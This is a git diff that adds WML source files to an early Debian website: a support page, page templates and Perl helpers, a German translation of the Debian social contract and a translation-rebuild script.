"<strong><a href="http://language.perl.com/misc/Artistic.html">Artistic</a></strong>" + licenses are examples of licenses that we consider "<em>free</em>". + </OL> + + <P><EM>Bruce Perens wrote the first draft of this document + and refined it using the comments of the Debian developers + during a month-long e-mail conference in June 1997. He + later removed the Debian-specific references from the + Debian Free Software Guidelines to create “The Open + Source Definition”.</EM> + + <HR> + <P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/support.wml b/english/support.wml new file mode 100644 index 00000000000..4e51ae7cfcb --- /dev/null +++ b/english/support.wml @@ -0,0 +1,109 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Support" + +<H1>Support</H1> + +<HR> + +<H2><A name="mail_lists">Mailing lists</A></H2> + +<P>Much of the the conversation between Debian developers and users is +managed through several mailing lists. Debian GNU/Linux is +developed through distributed development all around the world. +Therefore email is a preferred way to discuss various items. + +<P>There are several publicly available mailing lists while there are also some +lists which are only open to active developers. Please don't +interpret this as closed development. Everyone is encouraged to help +development of Debian and to spread the word of free software. +On the other hand it doesn't make much sense discussing internal +topics with non-developers. + +<P>All original Debian mailing lists run on a special server with a +mail transport agent that is optimized for lists. This host is +called lists.debian.org. All submission, subscription and +unsubscription messages have to go to this host. + +<P>The language used on all lists is English unless stated otherwise. +There are also some user lists for other languages available. + +<P>For information on the mailing lists and how to subscribe to them, see the +<A href="MailingLists/subscribe">Subscription Page</A>. +For information on unsubscribing, see the +<A href="MailingLists/unsubscribe">Unsubscription Page</A>. + +<P>You can also view old posts to the mailing lists using the +<A href="Lists-Archives/">mailing list archives</A>. + +<P>To contact the list maintainer, send E-Mail to +<A href="mailto:listmaster@lists.debian.org">listmaster@lists.debian.org</A>. + +<P>There are many other Linux mailing lists, which are not Debian-specific. +Please refer to this <A href="http://www.li.org/Resources/mail-lists.html"> +index</A>. + +<HR> +<H2>Reaching Package Maintainers</H2> + +<P>There are two ways of reaching package maintainers. If you need to +contact the maintainer because of a bug, simply file a bug report (see the +Bug Tracking System section below). The maintainer will get a copy of the +bug report. + +<P>If you simply want to communicate with the maintainer, then you can use +the special mail aliases set up for each package. Any mail sent to +<package name>@packages.debian.org will be forwarded to the maintainer +responsible for that package. + +<HR> +<H2>The Bug Tracking System</H2> + +<P>The Debian Linux distribution has a bug tracking system which +details bugs reported by users and developers. Each bug is given a +number, and is kept on file until it is marked as having been dealt +with. + +<P>To report a bug, you can use one of the bug pages listed below, or you +can use the Debian package 'bug' to automatically file a bug report. + +<P>Information on submitting bugs, viewing the currently active bugs, and the bug tracking +system in general can be retrieved from the <A href="Bugs/">current web site</A> or from one of +these mirrors: + +<P align="center"> +[ <A href="http://www.infodrom.north.de/Debian/Bugs/">Germany</A> +| <A href="http://www.chiark.greenend.org.uk/debian/Bugs/">United Kingdom</A> +| <A href="http://www.debian.org/Bugs/">United States</A> ] + + +<HR> +<H2><A href="consultants.html">Consultants</A></H2> + +<P>Debian is free software and offers free help through mailing lists. Some +people either don't have the time or have specialized needs and are willing +to hire someone to maintain or add additional functionality to their Debian +system. See the <A href="consultants.html">consultants page</A> for a list +of people/companies. + +<HR> +<H2><A name="irc">On-line Real Time Help Using IRC</A></H2> + +<P>IRC (Internet Relay Chat) is a way to chat with people from all over the world in real time. +An IRC channel dedicated to Debian can be found on irc.debian.org. +To connect, you need an IRC client. +Some of the most popular clients are ircII, BitchX, tkirc and Zircon, +all of which have been packaged for Debian. +Once you have the client installed, you need to tell it +to connect to server irc.debian.org by typing "<KBD>/server irc.debian.org</KBD>"; +and when connected, join channel #debian +by typing "<KBD>/join #debian</KBD>" (Zircon is different. It uses an intuitive +graphical interface). +At this point you will find yourself among the friendly crowd of #debian +inhabitants. You can also check out the +<A href="http://www.Infodrom.North.DE/Debian/user.html">list of frequent +users</A>. + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/template/debian/basic.wml b/english/template/debian/basic.wml new file mode 100644 index 00000000000..e3643eaa37b --- /dev/null +++ b/english/template/debian/basic.wml @@ -0,0 +1,31 @@ +#use wml::std::tags +#use wml::std::info +#use wml::std::box + +<define-tag page-style> +..style>>%0<<.. +</define-tag> + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> +<HTML lang="en"> +{: [[s/—/--/g]] [[s/–/-/g]] [[s/&[lr]dquo;/"/g]] [[s/‘/`/g]] [[s/’/'/g]] + +<HEAD> +<TITLE>$(title)</TITLE> +<LINK REV="made" HREF="mailto:webmaster@debian.org"> +<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> +<info style=meta> +<<style>> +</HEAD> + +<BODY text="#000000" bgcolor="#FFFFFF" link="#0000FF" vlink="#800080" alink="#FF0000"> + +#use wml::debian::navbar + +<<body>> + +</BODY> +:} +</HTML> + +..body>> diff --git a/english/template/debian/ctime.wml b/english/template/debian/ctime.wml new file mode 100644 index 00000000000..0e22357c6ff --- /dev/null +++ b/english/template/debian/ctime.wml @@ -0,0 +1,17 @@ +<perl> +use Time::Local; + +@dow = ( 'Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat' ); +@moy = ( 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', + 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' ); +sub ctime { + $WML_SRC_ISOTIME =~ /(..)-(..)-(....) (..):(..):(..)/; + local($time) = timelocal($6, $5, $4, $1, $2-1, $3); + local($sec, $min, $hour, $mday, $mon, $year, + $wday, $yday, $isdst) = localtime($time); + local($str) = sprintf("%s, %2d %s 19%s %02d:%02d:%02d %s", + $dow[$wday], $mday, $moy[$mon], $year, $hour, $min, $sec, + $isdst ? "-0600 (MDT)" : "-0700 (MST)"); + return $str; +} +</perl> diff --git a/english/template/debian/footer.wml b/english/template/debian/footer.wml new file mode 100644 index 00000000000..8be59cc8f9e --- /dev/null +++ b/english/template/debian/footer.wml @@ -0,0 +1,11 @@ +#use wml::debian::ctime +#use wml::debian::languages + +<P><SMALL> +Please send comments or corrections on these pages to +<A href="mailto:webmaster@debian.org">webmaster@debian.org</A> +</SMALL> + +<P><SMALL>Last Modified: <:= ctime () :><BR> +Copyright © 1997-1998 SPI; See <A href="$(HOME)/license">license terms</A>. +</SMALL> diff --git a/english/template/debian/languages.wml b/english/template/debian/languages.wml new file mode 100644 index 00000000000..8516c3a7f4e --- /dev/null +++ b/english/template/debian/languages.wml @@ -0,0 +1,39 @@ +<perl> + +my %langs = ("english" => "en", + "french" => "fr", + "german" => "de", + "italian" => "it", + "spanish" => "es", + "korean" => "kr", + "japanese" => "jp"); + +sub languages { + my ($base_url, $rel_dir, $file, $cur_lang) = @_; + my $str = ""; + + # print "$base_url $rel_dir $file $cur_lang\n"; + + # the following works, but should do this the right way + foreach(keys %langs) { + # print "$base_url/../$_/$rel_dir/$file.wml\n"; + if ( -f "$base_url/../$_/$rel_dir/$file.wml" ) { + if ($_ ne lc($cur_lang)) { + @used_langs = (@used_langs, $_); + } + } + } + if (@used_langs) { + $str = "<hr>\nThis page is also available in the following languages:<BR>\n"; + foreach (@used_langs) { + $t = ucfirst; + $str .= "<a href=\"$file.html.$langs{$_}\">$t</a> \n"; + } + $str .= "\n<BR><a href=\"$base_url/intro/cn.html.en\">How to set the ". + "default document language</a>\n"; + } + + return $str; +} + +</perl> diff --git a/english/template/debian/mainpage.wml b/english/template/debian/mainpage.wml new file mode 100644 index 00000000000..47b3fe90b94 --- /dev/null +++ b/english/template/debian/mainpage.wml @@ -0,0 +1,2 @@ +#use wml::debian::basic +#use wml::debian::menubar diff --git a/english/template/debian/menubar.wml b/english/template/debian/menubar.wml new file mode 100644 index 00000000000..bb0628ee8b6 --- /dev/null +++ b/english/template/debian/menubar.wml @@ -0,0 +1,82 @@ +<TABLE border="0" cellpadding="5" cellspacing="0" width="100%"> +<TR> + <TD valign="TOP" width="140" bgcolor="#99CCFF"> + <BR> + + <P><FONT face="Arial,Helvetica"><B><A href="$(HOME)/">Home</A></B></FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="$(INTRO)/about">About Debian</A></B><BR> + <SMALL> + <A href="$(HOME)/contact">Contact Us</A><BR> + <A href="$(HOME)/social_contract">Our Social Contract</A><BR> + <A href="$(HOME)/donations">Donations</A><BR> + <A href="$(INTRO)/international">Debian goes International</A><BR> + <A href="$(HOME)/related_links">Related Links</A> + </SMALL> + </FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="$(HOME)/news">News</A></B></FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="$(DISTRIB)/distrib">Distribution</A></B><BR> + <SMALL> + <A href="$(DISTRIB)/packages">Debian Packages</A><BR> + <A href="$(DISTRIB)/ftplist">Download via FTP</A><BR> + <A href="$(DISTRIB)/vendors">Debian on CD</A><BR> + <A href="ftp://ftp.debian.org/debian/stable/disks-i386/current/install.html"> + Installation Instructions</A><BR> + </SMALL> + </FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="$(HOME)/support">Support</A></B><BR> + <SMALL> + <A href="$(DOC)/">Documentation</A><BR> + <A href="$(HOME)/security/">Security Information</A><BR> + <A href="$(BUGS)/">Bug Tracking System</A> + <A href="Lists-Archives/">Mailing List Archives</A> + </SMALL> + </FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="$(HOME)/developers_corner">Developer's Corner</A></B></FONT></P> + <P><FONT face="Arial,Helvetica"><B><A href="http://insite.verisim.com/search/debian/simple">Search</A></B></FONT></P> + + <FORM ACTION="http://cgi.debian.org/cgi-bin/redirect.pl" METHOD="GET"> + <FONT SIZE="-1" FACE="ARIAL,HELVETICA" COLOR="#990000">Select a server near you:</FONT> + <BR> + <font size="-1" face="ARIAL,HELVETICA"> + <SELECT NAME="site"> + <OPTION VALUE="http://www.at.debian.org/">Austria</OPTION> + <OPTION VALUE="http://www.au.debian.org/">Australia</OPTION> + <OPTION VALUE="http://www.fr.debian.org/">France</OPTION> + <OPTION VALUE="http://www.de.debian.org/">Germany</OPTION> + <OPTION VALUE="http://www.jp.debian.org/">Japan</OPTION> + <OPTION VALUE="http://www.kr.debian.org/">Korea</OPTION> + <OPTION VALUE="http://www.il.debian.org/">Israel</OPTION> + <OPTION VALUE="http://www.nl.debian.org/">Netherlands</OPTION> + <OPTION VALUE="http://www.es.debian.org/">Spain</OPTION> + <OPTION VALUE="http://www.uk.debian.org/">United Kingdom</OPTION> + <OPTION VALUE="http://www.us.debian.org/">United States</OPTION> + <OPTION VALUE="http://www.debian.org/" selected>www.debian.org</OPTION> + </SELECT> + </font> + <INPUT TYPE="SUBMIT" VALUE=" Go "> + <BR> + </FORM> + + <P> + <A href="$(HOME)/sponsor.html"><IMG src="sponsor.jpg" border="0" vspace="16" alt="Visit the site sponsor"></A><BR> + <A href="http://validator.w3.org/"><IMG src="$(PICS)/vh40.gif" border=0 alt="Valid HTML 4.0!"></A> + </P> + + </TD> + + +<TD valign="TOP"> +<BR> + +<<mainbody>> + +<HR> +<DIV align=center> +#use wml::debian::footer +</DIV> + +</TD> +</TR> +</TABLE> + +..mainbody>> diff --git a/english/template/debian/navbar.wml b/english/template/debian/navbar.wml new file mode 100644 index 00000000000..1f20c0d03f4 --- /dev/null +++ b/english/template/debian/navbar.wml @@ -0,0 +1,21 @@ +<TABLE border="0" cellpadding="3" cellspacing="0" width="100%"> +<TR> +<TD> +<IMG src="$(PICS)/logo-50.gif" border="0" hspace="0" vspace="0" alt="[Debian Logo]"> +<IMG src="$(PICS)/banner-blue.gif" border="0" hspace="0" vspace="0" alt="Debian GNU/Linux"> +</TD> +</TR> + +<TR> +<TD BGCOLOR="#DD0000"> +<A href="$(HOME)/"><IMG src="$(PICS)/home.gif" border="0" hspace="2" vspace="3" alt="Home"></A> +<A href="$(INTRO)/about"><IMG src="$(PICS)/about.gif" border="0" hspace="2" vspace="3" alt="About Debian"></A> +<A href="$(HOME)/news"><IMG src="$(PICS)/news.gif" border="0" hspace="2" vspace="3" alt="News"></A> +<A href="$(DISTRIB)/distrib"><IMG src="$(PICS)/distrib.gif" border="0" hspace="2" vspace="3" alt="Distribution"></A> +<A href="$(HOME)/support"><IMG src="$(PICS)/support.gif" border="0" hspace="2" vspace="3" alt="Support"></A> +<A href="$(HOME)/developers_corner"><IMG src="$(PICS)/devel.gif" border="0" hspace="2" vspace="3" alt="Development"></A> +<A href="http://insite.verisim.com/search/debian/simple"><IMG src="$(PICS)/search.gif" border="0" hspace="2" vspace="3" alt="Search"></A> +</TD> +</TR> + +</TABLE> diff --git a/english/template/debian/recent_news.wml b/english/template/debian/recent_news.wml new file mode 100644 index 00000000000..219685ba0dc --- /dev/null +++ b/english/template/debian/recent_news.wml @@ -0,0 +1,23 @@ +<perl> + +sub get_recent_news { + open(FILEH, "<news.wml"); + $count = 0; + while (<FILEH>) { + if (/^<(LI|li)><(A|a) (HREF|href)=\"(#\w+)\">(.+)<\/(A|a)>$/) { + $count++; + $link = $4; + $title = $5; + $_ = <FILEH>; + if (/^\s*<(SMALL|small)>\((.*)\)<\/(SMALL|small)>$/) { + $date = $2; + } + $str .= "[$date] <a href=\"news$link\">$title<\/A><BR>\n"; + } + if ($count eq "6") { last; } + } +close FILEH; +return $str; +} + +</perl> diff --git a/english/template/debian/template.wml b/english/template/debian/template.wml new file mode 100644 index 00000000000..a25b049df0c --- /dev/null +++ b/english/template/debian/template.wml @@ -0,0 +1,8 @@ +#use wml::debian::basic + +<<mainbody>> + +<HR> +#use wml::debian::footer + +..mainbody>> diff --git a/german/.wmlrc b/german/.wmlrc new file mode 100644 index 00000000000..b6d7d0a2d8f --- /dev/null +++ b/german/.wmlrc @@ -0,0 +1,18 @@ +-D WML_SRC_REALNAME="Debian Webmaster" +-D WML_SRC_USERNAME=webmaster +-D WML_GEN_HOSTNAME=debian.org +-D HOME~. +-D CUR_LANG~German +-D INTRO~intro +-D DEVEL~devel +-D DOC~doc +-D DISTRIB~distrib +-D MISC~misc +-D BUGS~Bugs +-D PICS~Pics +-D STYLE~style +-D SPANISH~Spanish +-D ITALIAN~Italian +-D GERMAN~German +-D HTMLDIR~../html +-I template diff --git a/german/social_contract.wml b/german/social_contract.wml new file mode 100644 index 00000000000..a6983c465e8 --- /dev/null +++ b/german/social_contract.wml @@ -0,0 +1,193 @@ +#!wml -o ../debian.org/%BASE.html.de +#use wml::debian::template title="Debian GNU/Linux — Gesellschaftsvertrag" + +<H1>"Gesellschaftsvertrag" mit der Gemeinschaft für freie Software</H1> + + <!-- -*- Mode: Sgml -*- + Translator : Christian Leutloff (leutloff@debian.org) + Original text : social_contract.html + $Id$ + + With the help from: + + David Frey (david@eos.lugs.ch) + Andreas Jellinghaus (aj@dungeon.inka.de) + Frank Barknecht (barknech@ph-cip.uni-koeln.de) + Marcus Brinkmann (Marcus.Brinkmann@rz.ruhr-uni-bochum.de) + --> + + +<p> Wir sind "Software In The Public Interest", Hersteller +des Debian GNU/Linux Systems. Wir bieten diesen +<strong>"Gesellschaftsvertrag"</strong> der Gemeinschaft +für freie Software an. (Mit "Gemeinschaft für freie +Software" werden alle Hersteller und Anwender freier Software +bezeichnet.) + +<ol> +<li><p><strong>Debian wird 100% freie Software bleiben</strong></p> +<p> +Wir versprechen, das die Debian GNU/Linux Distribution auch weiterhin +vollständig aus freier Software bestehen wird. Da es viele verschiedene +Auslegungen des Begriffs "freie Software" gibt, haben wir +weiter unten die <a href="#dfsg">Richtlinien</a> aufgeführt, nach +denen wir freie Software identifizieren. Trotzdem werden wir Anwender +unterstützen, die nicht-freie Programme einsetzen oder entwickeln. Wir +werden aber niemals das Gesamtsystem von nicht-freier Software +abhängig machen. </p> + +<li><p><strong>Unser Beitrag zur Gemeinschaft für freie Software</strong></p> +<p> +Wenn wir neue Komponenten des Debian-Systems schreiben, so werden wir +sie als freie Software lizensieren. Wir werden das bestmögliche System +erstellen, so daß freie Software weit verbreitet und genutzt wird. Wir +werden Korrekturen, Verbesserungen, Anwenderwünsche usw. an die +ursprünglichen ("upstream") Autoren weiterleiten, deren +Programme in unser System integriert wurden. </p> + +<li><p><strong>Wir werden Probleme nicht verbergen</strong></p> +<p> +Wir werden unsere Fehlerdatenbank für alle Zeiten öffentlich +betreiben. Fehlermeldungen, die von Anwendern online abgeschickt +werden, werden augenblicklich für andere sichtbar. </p> + +<li><p><strong>Unsere Prioritäten sind unsere Anwender und freie +Software</strong></p> +<p> +Wir orientieren uns an den Bedürfnissen unserer Anwender und der +Gemeinschaft für freie Software. Ihre Interessen stehen an erster +Stelle. Wir werden unsere Nutzer bei ihrer Arbeit mit den +verschiedensten Rechnerumgebungen unterstützen. Wir haben nichts +dagegen, daß kommerzielle Software auf Debian-Systemen eingesetzt +wird. Außerdem erlauben wir anderen eine erweiterte +("Value-Added") Distribution zu erstellen, die Debian und +kommerzielle Software enthält, ohne dafür irgendwelche Gebühren zu +erheben. Um diese Ziele zu erreichen, werden wir ein integriertes +System von hoher Qualität und 100% freier Software anbieten, die die +gerade beschriebene Nutzung nicht durch rechtliche Einschränkungen, +wie z. B. durch Lizenzverträge, verhindert. +</p> + +<li><p><strong>Programme, die nicht unseren Standards für freie +Software genügen</strong></p> +<p> +Wir wissen, daß einige unserer Anwender unbedingt Programme einsetzen +müssen, die nicht den <a href="#dfsg">Debian-Richtlinien für freie +Software</a> entsprechen. Für solche Programme haben wird die +zusätzlichen Bereiche "<tt>contrib</tt>" und +"<tt>non-free</tt>" auf unserem FTP-Archiv eingerichtet. Die +Software in diesen Verzeichnissen ist nicht Bestandteil des +Debian-Systems, wurde aber trotzdem für den Einsatz in einem +Debian-System vorbereitet. Wir empfehlen den CD-Herstellern, die +jeweiligen Lizenzbestimmungen der Programmpakete in diesen +Verzeichnissen zu studieren und selbst zu entscheiden, ob sie die +Programme mit ihren CDs verteilen dürfen. Obwohl die Programme aus +"<tt>non-free</tt>" nicht Bestandteil der +Debian-Distribution sind, unterstützen wir ihren Einsatz und bieten +Infrastruktur für diese nicht freien Programme an, z. B. unsere +Fehlerdatenbank und die Mailing-Listen. +</p> + +</ol> + + + +<h2><a name="dfsg">Die Debian-Richtlinien für freie Software</a></h2> + +<p> +<ol> +<li><p><strong>Unbeschränkte Weitergabe</strong></p> +<p> +Ein Bestandteil der Debian-Distribution darf durch seine Lizenz nicht +verhindern, daß irgendjemand diese Software als Bestandteil einer +Software-Distribution, die Programme aus den verschiedensten Quellen +enthält, verkauft oder weitergibt. Die Lizenz darf keine Abgaben oder +sonstige Leistungen für einen solchen Verkauf fordern. +</p> + +<li><p><strong>Quellcode</strong></p> +<p> +Das Programm muß im Quellcode vorliegen, und es muß die Weitergabe +sowohl im Quellcode als auch in compilierter Form erlaubt sein. +</p> + +<li><p><strong>Weiterführende Arbeiten</strong></p> +<p> +Die Lizenz muß Veränderungen und weiterführende Arbeiten gestatten und +es erlauben, daß diese unter den gleichen Lizenzbedingungen +weitergegeben werden dürfen wie die Original-Software. +</p> + +<li><p><strong>Integrität des ursprünglichen Quellcodes</strong></p> +<p> +Die Lizenz darf die Weitergabe von verändertem Quellcode <em>nur +dann</em> verbieten, wenn sie die Weitergabe von sogenannten +<tt>Patch-Dateien</tt> mit dem Quellcode erlaubt, die dazu dienen, das +Programm vor seiner Herstellung zu modifizieren. Die Lizenz muß +ausdrücklich die Weitergabe der aus dem veränderten Quellcode +erzeugten Programme erlauben. Die Lizenz darf fordern, daß die +veränderten Programme einen anderen Namen oder eine andere +Versionsnummer tragen müssen. +<p> +(Dies ist ein Kompromiß. Die Debian-Gruppe ermutigt alle Autoren, +Veränderungen an Dateien sowohl im Quellcode als auch in Binärform +zu erlauben) </p> + +<li><p><strong>Keine Diskriminierung von Personen oder Gruppen</strong></p> +<p> +Die Lizenz darf keine Person oder Gruppe von Personen diskriminieren. +</p> + +<li><p><strong>Keine Diskriminierung von Einsatzbereichen</strong></p> +<p> +Die Lizenz darf keine Einschränkungen hinsichtlich des Einsatzbereichs +vornehmen. Beispielsweise darf sie nicht verhindern, daß das Programm +geschäftlich oder für genetische Forschungen verwendet wird. +</p> + +<li><p><strong>Weitergabe der Lizenz</strong></p> +<p> +Die mit einem Programm verbundenen Rechte müssen für alle gelten, +die das Programm erhalten, ohne daß es für sie notwendig ist, eine +zusätzliche Lizenz zu erwerben. +</p> + +<li><p><strong>Keine spezielle Lizenz für Debian</strong></p> +<p> +Die mit dem Programm verbundenen Rechte dürfen nicht davon abhängig +sein, daß das Programm Teil des Debian-Systems ist. Falls das Programm +aus der Debian-Distribution herausgenommen wird und ohne Debian genutzt oder +vertrieben werden soll, ansonsten aber im Rahmen der Programmlizenz +bleibt, so müssen alle Parteien, die das Programm bekommen, die +gleichen Rechte haben, wie sie im Zusammenhang mit dem Debian-System +gewährt wurden. +</p> + +<li><p><strong>Keine Auswirkungen auf andere Programme</strong></p> +<p> +Die Lizenz darf keine Beschränkungen besitzen, die Auswirkungen auf +andere Software hat, die mit diesem Programm weitergegeben +wird. Beispielsweise darf die Lizenz nicht vorschreiben, daß alle +anderen Programme auf dem gleichen Medium freie Software sein müssen. +</p> + +<li><p><strong>Beispiellizenzen</strong></p> +<p> +Die "<strong>GPL</strong>", "<strong>BSD</strong>" +und "<strong>Artistic</strong>" Lizenzen sind Beispiele für +Lizenzen, die wir als "<em>frei</em>" betrachten. + +</ol> + + <hr> + +<p><small> Dies ist die deutsche Übersetzung von "<a +href="social_contract.html.en">Debian's social contract +with the free software community</a>". In Zweifelsfällen ist das +englische Original maßgeblich. Es ist beispielsweise von <a +href="social_contract.html.en">social_contract.html</a> +verfügbar. </small></p> + <hr> + <p>Zurück zur <a href="./">Debian GNU/Linux Homepage</a>.</p> + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/new_translation.pl b/new_translation.pl new file mode 100755 index 00000000000..2eadef39cf2 --- /dev/null +++ b/new_translation.pl @@ -0,0 +1,42 @@ +#!/usr/bin/perl -w + +require 5.001; +use strict; + +my (@languages, @parts, $file, $filename, $lang, $path, $pid); + +if (!@ARGV) { + print "Usage: new_translation.pl <file1> <file2>...\n"; + print "\tThis will update every version of <file?> so that they\n"; + print "\tknow about the new translation. Each <file?> should be\n"; + print "\tthe path to a .wml file (without the language directory).\n"; + exit 1; +} + +opendir(DIR, ".") || die "can't open directory $!"; +@languages = grep { /^\w+$/ && -d $_ } readdir(DIR); +closedir DIR; +# print @languages; + +foreach $file (@ARGV) { + foreach $lang (@languages) { + @parts = split ?\/?,$file; + $filename = pop(@parts); + $path = join('/', @parts); + if ( -f "$lang/$file" ) { + print "running 'wml $lang/$path/$filename'\n"; + $pid = fork; + if ($pid) { # parent + # do nothing + } + else { # child + chdir "$lang/$path" && system("wml", $filename); + exit 0; + } + waitpid($pid,0); + } + else { + print "$lang/$file doesn't exist\n"; + } + } +} |